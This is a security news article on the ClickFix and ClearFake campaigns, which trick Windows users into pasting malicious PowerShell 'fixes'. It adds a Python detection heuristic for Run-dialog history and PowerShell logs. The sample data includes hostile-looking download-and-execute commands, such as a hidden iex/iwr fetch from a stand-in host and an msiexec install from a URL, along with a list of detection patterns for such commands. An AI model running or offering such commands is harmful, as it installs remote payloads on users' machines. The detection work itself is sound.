Hackers love to trick victims into doing things they would not otherwise do, and the new malware campaign currently doing the rounds online is a perfect example of this.
As reported by BleepingComputer, hackers are using fake Google Chrome and Microsoft Word errors to trick potential victims into running malicious PowerShell "fixes" that actually install malware.
This particular campaign has been very effective and has been used in attacks by multiple threat actors, including the one behind ClearFake, a newly identified attack cluster called ClickFix, and the TA571 group.
Here's everything you need to know about this new malware campaign, and how you can avoid falling victim to the social engineering it uses to infect your Windows PC with malware.
Similar to the previous ClearFake campaign, this new campaign uses overlays to display fake Chrome and Word errors. Potential victims are asked to click a button that copies the "fix" for the fake error to the clipboard, and are then told to paste the copied code into the Windows Run dialog or a PowerShell prompt.
In a new report detailing the different attack chains used in the campaign, Proofpoint says that compromised websites which use Binance's Smart Chain contracts to load malicious scripts hosted on the blockchain can also infect vulnerable Windows PCs with malware.
This script performs some checks before displaying a fake Google Chrome warning claiming that there was a problem displaying the web page. From there, the victim is prompted to install a "root certificate" by copying a PowerShell script and running it in a Windows PowerShell (Administrator) console.
Running this PowerShell script performs further checks to ensure that the device is a valid target before downloading additional payloads, including information-stealing malware.
Finally, there is also an email-based infection chain that uses HTML attachments designed to look like Word documents. These urge potential victims to install a "Word Online" extension to view the document, but, as in the other attack chains used in this campaign, the "fix" is a PowerShell command that must be copied and pasted into PowerShell.
In this attack chain, the PowerShell commands download and run either MSI files or VBS scripts to infect the target PC with either the Matanbuchus or the DarkGate malware.
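All three chains end the same way, with the victim pasting a command into the Run dialog or a PowerShell prompt, so the traces they leave on the PC are consistent: Explorer records Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (each value is the command followed by a "\1" marker), and, when script block logging is enabled, PowerShell writes the text of every executed script block to the Microsoft-Windows-PowerShell/Operational log as event ID 4104. The Python below is an added example, not code from this article, BleepingComputer or Proofpoint, that scores such entries for the download-and-execute traits described above. The registry values and event texts are constructed samples, the URLs use the reserved example.invalid domain, and the indicator list, weights and threshold are this example's own heuristics rather than a vendor signature.

```python
import re
from dataclasses import dataclass

# Heuristic indicators for a pasted ClickFix-style "fix": the command must
# fetch a second stage and run it without the victim seeing a window.
# Patterns are matched against the lowercased command. Weights and the
# threshold below are choices made for this example, not a vendor signature.
INDICATORS = [
    (r"\b(iex|invoke-expression)\b", 3),
    (r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget|start-bitstransfer)\b", 3),
    (r"-(e|ec|enc|encodedcommand)\b", 3),
    (r"frombase64string", 2),
    (r"-w(indowstyle)?\s+hidden", 2),
    (r"\bmshta\b", 3),
    (r"\bmsiexec(\.exe)?\b.*https?://", 3),      # MSI pulled straight from a URL
    (r"\b(wscript|cscript)\b.*\.vbs", 3),         # VBS dropper launched from the command
    (r"/qn\b|/quiet\b", 1),
    (r"https?://", 1),
    (r"-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", 2),
]
THRESHOLD = 5  # a lone download (3) plus a URL (1) stays below it


@dataclass
class Verdict:
    source: str        # "RunMRU" or "ScriptBlock"
    command: str
    score: int
    hits: list[str]

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_command(command: str) -> tuple[int, list[str]]:
    """Return the summed weight of matching indicators and the patterns that hit."""
    text = command.lower()
    score, hits = 0, []
    for pattern, weight in INDICATORS:
        if re.search(pattern, text):
            score += weight
            hits.append(pattern)
    return score, hits


def runmru_entries(values: dict[str, str]) -> list[str]:
    """Return Run-dialog commands most-recent first, as ordered by MRUList."""
    out = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        # Explorer stores each entry as "<command>\1"; drop that marker.
        out.append(raw[:-2] if raw.endswith("\\1") else raw)
    return out


def hunt(runmru: dict[str, str], scriptblocks: list[str]) -> list[Verdict]:
    """Score every Run-dialog entry and every 4104 script block text."""
    results = []
    for cmd in runmru_entries(runmru):
        score, hits = score_command(cmd)
        results.append(Verdict("RunMRU", cmd, score, hits))
    for text in scriptblocks:
        score, hits = score_command(text)
        results.append(Verdict("ScriptBlock", text, score, hits))
    return results


# Constructed sample data (not captured from a real host). MRUList "cab"
# means value c was used most recently, then a, then b.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "powershell -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/fix.ps1' -UseBasicParsing)\"\\1",
    "c": "mstsc\\1",
}

# Constructed 4104 script block texts: one benign listing, an MSI fetched from
# a URL, a base64-decoded stage piped to iex, and a benign download that stays
# under the threshold because it carries no execution or hiding indicators.
SAMPLE_SCRIPTBLOCKS = [
    "Get-ChildItem C:\\Users",
    "msiexec /i http://example.invalid/u.msi /qn",
    "$b='...';[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b))|iex",
    "Invoke-WebRequest https://www.microsoft.com -OutFile page.html",
]

if __name__ == "__main__":
    for v in hunt(SAMPLE_RUNMRU, SAMPLE_SCRIPTBLOCKS):
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"[{flag:10}] {v.source:11} score={v.score:2} {v.command}")
```

On a real host, export the RunMRU values with reg.exe or Get-ItemProperty and collect event 4104 with Get-WinEvent from the Microsoft-Windows-PowerShell/Operational log, then pass them to hunt(). A hit is a prompt to read the command and trace what it fetched, not proof of compromise on its own; administrators who routinely download installers will trip the URL indicators and are why the threshold sits above a bare download.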
The three attack chains used in this campaign all rely on the fact that most Windows users are not aware of the dangers of running unknown PowerShell commands on their PCs. This is why you should never copy and run a command you do not understand, no matter what a web page or document tells you it will fix.
Similarly, you should make sure that Windows Defender is enabled and running on your PC so that it can catch the malware dropped by these malicious PowerShell scripts. If you want even more protection, you can also consider a third-party antivirus suite alongside Microsoft's built-in protection, as these often come with extras like VPNs and password managers.
Before doing anything online, and especially when a page or document throws up an overlay telling you to fix something, stop and take a minute to think. Hackers often try to instill a sense of urgency so that you act without thinking. Instead, read the message carefully and look it up online to see whether it is genuine. Even if you don't find any information online, in most cases doing nothing is the best course of action.
Overlay attacks are very effective because they often appear to come from the software you are currently using. But by learning how they work and knowing what to watch out for, you can keep your devices and data safe.